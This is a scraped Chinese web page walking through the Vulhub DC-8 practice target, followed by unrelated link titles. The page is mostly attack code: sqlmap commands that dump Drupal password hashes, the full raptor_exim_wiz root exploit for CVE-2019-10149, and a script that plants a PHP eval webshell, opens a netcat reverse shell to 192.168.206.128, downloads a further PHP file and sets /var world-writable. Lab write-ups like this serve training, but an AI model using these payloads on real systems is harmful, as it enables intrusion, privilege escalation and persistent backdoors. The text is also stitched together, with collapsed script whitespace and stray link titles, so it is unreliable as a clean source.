Vulhub-DC-8靶场实战攻略
sqlmap -u http://192.168.206.142/?nid=1 -D d7db --tables
name | pass |
+--------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
python -c 'import pty;pty.spawn("/bin/bash")'
find / -user root -perm -4000 -print 2>/dev/null
/usr/sbin/exim4 --version
#!/bin/bash#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'# usage instructions
function usage()
{echo "$0 [-m METHOD]"echoecho "-m setuid : use the setuid payload (default)"echo "-m netcat : use the netcat payload"echoexit 1
}# payload delivery
function exploit()
{# connect to localhost:25exec 3<>/dev/tcp/localhost/25# deliver the payloadread -u 3 && echo $REPLYecho "helo localhost" >&3read -u 3 && echo $REPLYecho "mail from:<>" >&3read -u 3 && echo $REPLYecho "rcpt to:<$PAYLOAD>" >&3read -u 3 && echo $REPLYecho "data" >&3read -u 3 && echo $REPLYfor i in {1..31}doecho "Received: $i" >&3doneecho "." >&3read -u 3 && echo $REPLYecho "quit" >&3read -u 3 && echo $REPLY
}# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo# parse command line
while [ ! -z "$1" ]; docase $1 in-m) shift; METHOD="$1"; shift;;* ) usage;;esac
done
if [ -z $METHOD ]; thenusage
fi# setuid method
if [ $METHOD = "setuid" ]; then# prepare a setuid shell helper to circumvent bash checksecho "Preparing setuid shell helper..."echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.cgcc -o /tmp/pwned /tmp/pwned.c 2>/dev/nullif [ $? -ne 0 ]; thenecho "Problems compiling setuid shell helper, check your gcc."echo "Falling back to the /bin/sh method."cp /bin/sh /tmp/pwnedfiecho# select and deliver the payloadecho "Delivering $METHOD payload..."PAYLOAD=$PAYLOAD_SETUIDexploitecho# wait for the magic to happen and spawn our shellecho "Waiting 5 seconds..."sleep 5ls -l /tmp/pwned/tmp/pwned# netcat method
elif [ $METHOD = "netcat" ]; then# select and deliver the payloadecho "Delivering $METHOD payload..."PAYLOAD=$PAYLOAD_NETCATexploitecho# wait for the magic to happen and spawn our shellecho "Waiting 5 seconds..."sleep 5nc -v 127.0.0.1 31337# print help
elseusage
fi
#!/bin/bash
cd /var/www/html/
touch muma2.php
echo '<?php eval($_POST[1]);?>' >> /var/www/html/muma2.php
nc -e /bin/sh 192.168.206.128 10010
wget http://192.168.206.128:8000/miansha.php
chmod 777 ./miansha.php
chmod -R 777 /var/*
Vulhub-DC-8靶场实战攻略相关推荐
- VMware HA实战攻略之四VMware HA安装及配置
[IT168 专稿]在前面三篇文章中(点击1.2.3),不但讲述了如何准备适合虚拟化的硬件.软件,以及如何使用现有的硬件.软件搭建一套实验环境,还讲述了通过VC Server如何添加主机和ISCSI存 ...
- Cempi实战攻略(六)——如何截获到达的短消息
Cempi实战攻略(六)--如何截获到达的短消息 By 吴春雷 QQ:819543772 EMAIL:wuchunlei@163.com 1. MapiRule是什么?我从哪里能够得到它? ...
- VMware HA实战攻略之五VMwareHA测试验收
[IT168 专稿]在上一篇"VMware HA实战攻略之四VMwareHA安装及配置"中(点击),讲述了VMwareHA的概念及创建过程,还讲述了创建过程中要注意的一些事项. 在 ...
- CEMAPI实战攻略(四)——发送短消息
CEMAPI实战攻略(四)--发送短消息 By 吴春雷 QQ:819543772 EMail:wuchunlei@163.com 四.发送短消息 发送短信是一个相对比较简单的过程,之所以拿出来一节来讨 ...
- 微软官方Windows Server 2008实战攻略系列
微软Windows Server 2008实战攻略系列之十八:Windows Server 2008 高可用性配置实现 http://download.microsoft.com/download/f ...
- (全部)2008重磅出击——微软Windows Server 2008实战攻略系列
微软Windows Server 2008实战攻略系列之十八:Windows Server 2008 高可用性配置实现 [url]http://download.microsoft.com/downl ...
- Mware HA实战攻略之五VMwareHA测试验收
[IT168 专稿]在上一篇"VMware HA实战攻略之四VMwareHA安装及配置"中(点击),讲述了VMwareHA的概念及创建过程,还讲述了创建过程中要注意的一些事项. 在 ...
- 弱电布线工程实战攻略
弱电布线工程实战攻略 数字家庭这个名词对很多年轻人不陌生,但是如何让自己未来的蜗居或者豪宅也成为时尚现代便捷的智能之家呢,这其中当然有很多需要了解和掌握的知识,想必绝大多数的朋友都对高清视频.无线互联 ...
- FPGA之IBIS模型编辑实战攻略
通常我们获得的FPGA IBIS模型是这款芯片的通用模型,在信号完整性仿真中使用起来,很不方便.究其原因,其实就是管脚映射不对.每个FPGA在实际应用时,都会根据产品功能.单板空间等情况,对FPGA的 ...
- 直播预告 | 企业如何轻松完成数据治理?火山引擎 DataLeap 给你一份实战攻略!
更多技术交流.求职机会,欢迎关注字节跳动数据平台微信公众号,回复[1]进入官方交流群 企业数字化转型正席卷全球,这不仅是趋势所在,也是企业发展必然面对的考题,也是企业最关心.最难决策的难题,数字化不仅 ...
最新文章
- localhost❤matrix6
- 【深度学习】梯度消失和梯度爆炸问题的最完整解析
- Android开发中java.lang.RuntimeException: Unable to start activity ComponentInfo{xxx}: java.lang.NullPoi
- 高可用Eureka注册中心配置说明(双机部署)
- jQuery 计时器(jquery timers)简单应用
- 【英语学习】【Level 07】U08 Old Stories L3 Lights, camera, action!
- [C++] - dynamic_cast介绍及工作原理、typeid、type_info
- 【Python 04】Python开发环境概述
- notepad++设置自动刷新文本(中文版/英文版)
- C#.NET里面的多线程处理
- Codeforces Round #563 (Div. 2) A. Ehab Fails to Be Thanos
- 热烈祝贺龙芯Loongarch OpenJDK8开源,已编译完成
- Atitit 常见概念与技术 dom及其解析 目录 1.1. Dom概念(文档对象模型(Document Object Model))是什么	1 1.1.1. 节点	2 1.1.2. Node 层次
- 用打印服务器打印打印机显示脱机,菜鸟也专业 打印机脱机故障处理方法
- 网络操作系统VyOS之NAT实践
- ibm量子云计算机,IBM量子云的16个量子比特全被纠缠起来了!
- “猫”和路由器是一个东西吗?
- 绝招:技术专家教你打造个性域名!
- Oracle ebs r12官方虚拟机配置
- 电脑使用习惯(For Yuki)
热门文章
- mysql 1114错误_mysql出现错误编码1114的解决方法
- buu-[QCTF2018]Xman-babymips
- c语言输出0.000000或乱码,深究
- 一个函数能否被两个线程同时调用
- php get month,JavaScript从Date对象返回月份 (0 ~ 11)的方法getMonth()
- matlab wmaxlev函数,CT-PET小波图像融合在精确放射治疗应用研究
- JavaWeb宿舍管理系统环境搭建运行教程
- GLM(General Language Model)代码分析
- 杰出人物的四大法宝——与成功学大师对话
- 错误码errno和perror函数